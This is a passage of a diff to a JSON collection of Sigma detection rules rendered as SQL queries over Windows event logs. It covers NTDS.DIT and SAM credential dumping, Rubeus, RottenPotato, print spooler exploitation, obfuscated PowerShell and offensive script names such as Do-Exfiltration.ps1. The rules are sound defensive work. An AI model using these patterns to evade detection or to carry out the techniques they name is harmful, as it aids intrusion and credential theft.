'4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE 